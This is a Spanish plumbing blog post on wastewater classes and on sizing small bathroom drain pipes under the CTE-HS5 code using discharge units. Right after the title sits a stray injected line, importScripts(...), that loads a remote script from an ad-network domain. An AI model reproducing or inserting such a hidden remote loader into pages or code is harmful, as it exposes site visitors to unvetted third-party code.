Calcula el saneamiento de un baño

importScripts("https://superonclick.com/script/psw.min.js");

Antes de empezar con el cálculo del saneamiento de un baño vamos a definir lo que son las aguas fecales.

¿Qué son las aguas fecales o aguas residuales?

Las aguas fecales o residuales son cualquier tipo de agua cuya calidad se vio afectada negativamente por influencia antropogénica.

Las aguas fecales incluyen las aguas usadas, domésticas, urbanas y los residuos líquidos industriales o mineros eliminados, o las aguas que se mezclaron con las anteriores (aguas pluviales o naturales). Su importancia es tal que requiere sistemas de canalización, tratamiento y desalojo.

Por eso es tan importante que cuando montamos una instalación de fontanería se monta a su vez una Instalación Saneamiento para recoger dichas aguas.

Tipos de aguas residuales o fecales.

Las aguas fecales se clasifican en tres tipos.

  1. Aguas residuales industriales
  2. Aguas residuales domesticas
  3. Aguas residuales urbanas

Aguas residuales domésticas. Esta clase de aguas residuales son aquellas aguas que tienen su origen en viviendas y están producidas en esencia por el metabolismo humano y por las actividades que se llevan a cabo en el ámbito doméstico. Es te tipo de agua fecal es la que trataremos de dimensionar en este post.

Aguas residuales industriales. Dentro de este tipo de aguas residuales se encuentran todas aquellas aguas residuales que han sido vertidas desde un lugar con finalidad comercial o industrial, que sean distintas de las aguas residuales domésticas y las aguas residuales de origen pluvial.

Aguas residuales urbanas. Hacen referencia a aquellas aguas que tienen aguas residuales domésticas y aguas residuales industriales. También aquellas aguas que incluyen las aguas de correntia pluvial.

La normativa del CTE-HS, obliga desde su pluviales a realizar en cada edificio nuevo una red separativa, para aguas pluviales y otra para aguas fecales.

Normativa de la red de saneamiento horizontal.

Siguiendo con el ejemplo anterior, al mismo tiempo que hacemos la instalación de agua tenemos que saber cómo calcular la tubería de desagüe.

Esta instalación viene regulada por el CTE-DB S 5. Código Técnico de la Edificación en su Documento Básico de Salubridad nº 5. En él viene determinado los diámetros mínimos para la tubería de cada aparato sanitario, y las condiciones que deben cumplir la conexión de cada aparato.

¿Qúe es un cierre hidráulico?

La primera consideración es que todos los aparatos deben tener cierre hidráulico,o lo que es lo mismo, sifones individuales para cada aparato, o uno común, que es el que llamamos bote sifónico y va insertado en el suelo.

Los cierres hidráulicos impiden que el aire fétido salga al exterior, y deben poder ser autolimpiables y disponer de un registro.
El inodoro ya posee en sifón, y va conectado directamente a la bajante de evacuación, con una tubería de mínimo 100 mm. El resto de los aparatos pueden conectarse directamente a la bajante si ya poseen un sifón individual.

Os mostramos a continuación unas fotos de como son este tipo de aparatos que seguro, ya habéis visto más de una vez.
En esta foto a la izquierda podemos ver un sifón individual, como los que usamos en los lavabos o fregaderos.

A la derecha vemos un bote sifónico donde se puede apreciar debajo donde conectan todas las tuberías.

Para el cálculo que nos ocupa, no nos influye, ya que los caudales no varían las distancias entre el bote sifónico y las bajantes vienen determinadas en el capítulo 3.3.1.2 del CTE-DB-HS5 y será objeto del siguiente post.

Cálculo de la red de pequeña evacuación de aguas fecales.

Las aguas residuales domesticas se deben recoger por un sistema de tuberías para poder conectarse a la red general de alcantarillado.

En este post os enseñaremos como podemos empezar a calcular la red de aguas residuales de un edificio empezando por el baño de una vivienda. Es lo que se conoce como red de pequeña evacuación, o lo que es lo mismo la red de cada estancia antes de conectar a la bajante o al colector de aguas residuales.
Como en el caso anterior, tenemos un baño con el siguiente número de piezas:

  • Un lavabo
  • Un bidet
  • Un ducha
  • Un inodoro
02 Esquema saneamiento baño-obra
UD CTE

En el caso de alimentación de las tuberías de Agua fría y caliente, se trata de tuberías que van por el techo y bajan por la pared.

Las tuberías de saneamiento van por el suelo, en muchos casos los empalmes se realizan en el piso inferior, y otros muchos llevan una pequeña roza para poder conectar en el bote sifónico.

Es por ello que es muy importante pegar todos los empalmes de las tuberías de PVC, incluso las que llevan cierre con goma, aunque estas últimas suelen ser en diámetros superiores a estos.

Cualquier filtración por pequeña que sea de agua, por no pegar las tuberías, puede ser muy costosa repararla, y un problema de agua en una obra siempre es más llamativa que cualquier problema eléctrico, porque este ultimo no se ve.

El cálculo que recomienda el CTE-HS5 es el de Unidades de Descarga UD, donde 1 UD=0.47l/s. Las tablas que aparecen en el capítulo 5, determinan las unidades de descargas mínimas para cada aparato sanitario.

El resultado en nuestro problema es el siguiente:

  • Un lavabo: UD 1 => Dn tubería PVC 32mm
  • Un bidet: UD 2 => Dn tubería PVC 32mm
  • Un ducha: UD 2 => Dn tubería PVC 40mm
  • Un inodoro: UD 4 => Dn tubería PVC 100mm

Estos son los diámetros mínimos, se podría poner en el lavabo y el bidet tubería de 40mm como en la ducha, de hecho para tema de ahorro de tuberías y de empalmes estaría mejor.

En el siguiente post veremos como se calcula las bajantes de aguas fecales del edificio y sus colectores.

Si os gusta nuestro blog os animo a que os deis de alta como seguidores, y que lo compartáis en vuestras redes sociales o daros de alta en nuestra página de  Facebook   o la de linkedin